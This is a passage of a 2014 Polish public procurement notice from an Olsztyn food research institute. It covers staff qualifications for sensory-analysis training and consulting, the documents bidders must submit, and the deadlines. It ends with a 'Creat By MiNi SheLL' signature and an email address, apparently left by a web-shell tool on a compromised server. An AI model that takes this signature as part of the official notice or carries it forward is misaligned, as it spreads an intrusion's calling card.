3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

B Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego doktora nauk rolniczych  w dyscyplinie technologia żywności  i żywienie.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

C Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego doktora nauk rolniczych  w dyscyplinie technologia żywności  i żywienie.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

D Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego mgr. inż. w  zakresie nauk o żywności i żywieniu.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie   wg wzoru - Załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pan.olsztyn.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk,  ul. Bydgoska 7, 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2014 godzina 12:00, miejsce: Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk,  ul. Bydgoska 7, 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pt.: Badania sensoryczne jako metody opracowania i udoskonalenia produktów firm sektora rolno - spożywczego województwa warmińsko-mazurskiego, współfinansowany ze środków Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com